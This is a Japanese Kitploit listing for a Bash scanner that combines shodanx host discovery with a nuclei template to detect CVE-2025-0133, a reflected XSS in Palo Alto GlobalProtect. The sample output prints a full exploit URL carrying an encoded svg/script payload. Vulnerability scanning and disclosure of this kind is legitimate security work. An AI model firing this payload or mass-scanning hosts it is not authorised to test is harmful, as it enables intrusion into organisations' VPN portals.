Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-0133 — Palo Alto GlobalProtect Gateway & Portal で発見された反射型XSS脆弱性。攻撃者は巧妙に細工されたリクエストを介して悪意のあるスクリプトを注入できる。 | Kitploit
ツール/GitHubGitHub/inteleon404/cve-2025-0133
偵察脆弱性スキャナーウェブ脆弱性スキャナーエクスプロイトウェブセキュリティペネトレーションテスト
GitHubinteleon404/cve-2025-0133

CVE-2025-0133

Palo Alto GlobalProtect Gateway & Portal で発見された反射型XSS脆弱性。攻撃者は巧妙に細工されたリクエストを介して悪意のあるスクリプトを注入できる。

リポジトリを見る
1021年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2025-0133 脆弱性スキャナ

Bash ベースの自動スキャナツールで、nuclei と shodanx を使用して Palo Alto GlobalProtect Gateway & Portal の CVE-2025-0133 Reflected XSS 脆弱性を検出します。


作者:

日付: 2025-06-23
深刻度: 中
CVE ID: CVE-2025-0133
脆弱性の種類: Reflected Cross-Site Scripting (XSS)
検証対象: Palo Alto Networks GlobalProtect Portal (PAN-OS)


概要

このツールは、ペネトレーションテスターやセキュリティ研究者が、CVE-2025-0133 に関連する脆弱なドメインや IP を迅速に特定するのに役立ちます。
nuclei テンプレートと Shodan クエリ統合 (shodanx) を活用して、ターゲットを効率的に発見・スキャンします。


機能

  • 入力が単一のドメインか、複数のドメイン/IP を含むファイルかを自動的に判別します
  • 単一ドメインに対して shodanx を実行し、関連するホストを収集します
  • カスタム CVE-2025-0133 テンプレートを使用して nuclei でターゲットをスキャンします
  • スキャン結果をコマンドライン上に見やすい表形式で表示します
  • スキャンの開始時刻と終了時刻を表示します
  • 結果を .txt 形式と .json 形式の両方で保存するかどうかを確認します
  • 組み込みのヘルプと使用手順を備えています

必要条件

  • Bash シェルを備えた Linux 環境
  • nuclei がインストールされ、$PATH からアクセス可能であること
  • shodanx) がインストールされ、設定済みであること
  • CVE-2025-0133 nuclei テンプレートファイルが次の場所にあること:
    /home/user/nuclei-templates/http/cves/2025/CVE-2025-0133.yaml (必要に応じてパスを更新)

📦 必要なツールのインストール

🔹 1. ShodanX のインストール

root@kitploit:~
pip install git+https://github.com/RevoltSecurities/ShodanX 

次のエラーが表示された場合: "error: externally-managed-environment"

root@kitploit:~
pip install git+https://github.com/RevoltSecurities/ShodanX --break-system-packages

⚠️ 注意: --break-system-packages オプションは、一部のシステム (特に Debian/Ubuntu) で、仮想環境の外部に pip パッケージを権限エラーなしでインストールできるようにするために必要です。

👉 shodanx が $PATH に含まれていることを確認してください。 次のコマンドでテストできます:

root@kitploit:~
shodanx -h

🔹 2. Nuclei のインストール

root@kitploit:~
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

インストールされたか確認:

root@kitploit:~
nuclei -version

次にテンプレートを更新:

root@kitploit:~
nuclei -update-templates

使い方

root@kitploit:~
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh -h 
Usage: ./cve20250133.sh <domain-or-file>

Scan CVE-2025-0133 vulnerabilities using nuclei and shodanx.
If input is a file, scan domains/IPs from the file.
If input is a domain, run shodanx to find related IPs/domains and scan them.

Options:
  -h, --help, help     Show this help message and exit.


使用例

単一ドメインをスキャン

root@kitploit:~
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh domain.com
Scan Start Time: 2025-06-24 16:33:51


▄▖▖▖▄▖  ▄▖▄▖▄▖▄▖  ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖  ▙▖█▌▙▖▄▌  █▌▟▖▄▌▄▌
                          
-INTELEON404


[✔] Input is a single domain: domain.com — Running ShodanX first
     _                               _      
    | |            |                (_\  /  
 ,  | |     __   __|   __,   _  _      \/   
/ \_|/ \   /  \_/  |  /  |  / |/ |     /\   
 \/ |   |_/\__/ \_/|_/\_/|_/  |  |_/ _/  \_/
                                            
                                            

                     - RevoltSecurities

[version]:shodanx current version v1.1.1 (latest)
[*] Scanning domain 123.45.67.890...

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

        projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 850.496188ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------

ファイルからスキャン

root@kitploit:~
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh file.txt       
Scan Start Time: 2025-06-24 16:36:37


▄▖▖▖▄▖  ▄▖▄▖▄▖▄▖  ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖  ▙▖█▌▙▖▄▌  █▌▟▖▄▌▄▌
                          
-INTELEON404


[✔] Input is a file: file.txt — Skipping ShodanX
[*] Scanning domain 123.45.67.890 ...

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

        projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 28.825193ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------

CVE-2025-0133 の詳細

Palo Alto GlobalProtect Gateway & Portal における Reflected Cross-Site Scripting (XSS) 脆弱性で、攻撃者が巧妙に細工したリクエストを介して悪意のあるスクリプトを注入できるようになります。 この問題を軽減するには、最新の Palo Alto Networks リリースへ更新してシステムにパッチを適用してください。


ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。

ツールをダウンロード